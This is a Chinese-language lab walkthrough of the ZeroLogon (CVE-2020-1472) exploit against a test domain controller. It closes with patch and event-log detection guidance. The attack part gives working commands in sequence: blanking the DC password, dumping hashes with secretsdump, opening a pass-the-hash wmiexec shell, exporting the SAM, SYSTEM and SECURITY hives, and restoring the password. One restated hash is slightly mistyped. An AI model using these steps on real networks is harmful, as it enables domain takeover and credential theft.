ZeroLogon漏洞复现(CVE-2020-1472)

漏洞简介

NetLogon组件
是 Windows 上一项重要的功能组件，用于用户和机器在域内网络上的认证，以及复制数据库以进行域控备份，同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。

当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时，存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。

漏洞影响

漏洞复现

搭建搭建

见上一篇文章《Windows域环境搭建》

靶机信息：

漏洞验证

https://github.com/SecuraBV/CVE-2020-1472

python3 zerologon_tester.py DC 192.168.235.128

已验证靶机存在该漏洞。

漏洞利用

整个利用过程大概如下：

• 置空域控密码

• 获取新凭据

• 获取半交互式shell-wmiexec.py

• 获取初始凭据（sam）

• 还原域控密码

置空域控密码

python exp/cve-2020-1472-exploit.py dc 192.168.235.128

获取新凭据

这里获取的凭据是域管理员密码已被置空后的凭据

用/impacket/examples/secretsdump.py来获取域控中保存的hash

密码已成功置空 ：

获取半交互shell-wmiexec.py

wmiexec.py

获取到HASH之后接下来我们就可以利用wmiexec.py登录,生成一个半交互式shell(管理员权限)

./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:bed8fa867b81ae20c4b1c49c9f8fd72e qwe/Administrator@192.168.235.128

获取初始凭据（sam）

需要恢复域控的密码，所以要从sam中提取初始（置空前）的凭据

tips:注册表解析

HKLM\SAM：包含用户密码的NTLM V2 HashHKLM\Security：包含缓存的域记录LSA secrets/LSA密钥HKLM\system-aka SYSKEY：包含可以用于加密LSA sercret和和SAM数据库的密钥

获取到shell后, 利用注册表命令将目标机上的的sam、system等文件导出

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save

下载导出的文件到本地

get sam.save
get system.save
get security.save

删除保存在目标机上的文件

del f sam.save
del f system.save
del f security.save

利用/examples/secretsdump.py解析已经下载到在本地的sam

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:319afc90817a4762d2ad1f8ee9154877

初始初hash为：

319afc90817a4762d2ad1f8ee915487

还原域控密码

python3 reinstall_original_pw.py dc 192.168.235.128 319afc90817a4762d2ad1f8ee9154877

验证是否还原成功

python3 secretsdump.py qwe/Administrator:@dministrator2021@192.168.235.128 -just-dc-user 'DC$'

已成功还原。

漏洞原理

Netlogon 特权提升漏洞(CVE-2020-1472)原理分析与验证

https://www.anquanke.com/post/id/219943

漏洞防御

1. 安装补丁

   https://msrc.microsoft.com/update-guide/zh-cn/vulnerability/CVE-2020-1472

威胁狩猎

日志审计

通过日志审计及时发现攻击者的攻击行为 。

• CompMgmtLauncher -   服务器管理器

• eventvwr -  事件查看器

• compmgmt.msc -  计算机管理

CompMgmtLauncher :

eventvwr：

可以通过事件ID 4742和 事件ID 5805 初步判断 Zerologon 漏洞攻击：

事件 ID 4742：

事件 ID 5805：

例图：

CVE-2020-1472EventReader.ps1

帮助监视与CVE-2020-1472相关的Netlogon安全通道连接更改相关的事件ID的脚本:

https://support.microsoft.com/en-us/topic/script-to-help-in-monitoring-event-ids-related-to-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-26434ae1-f9b9-90a0-cd0a-cfae9c5b2494

详见

https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73cd1a11e#Windows%20event%20log%20errors

参考：

https://github.com/dirkjanm/CVE-2020-1472

https://www.secura.com/blog/zero-logon

https://github.com/risksense/zerologon

https://github.com/bb00/zer0dump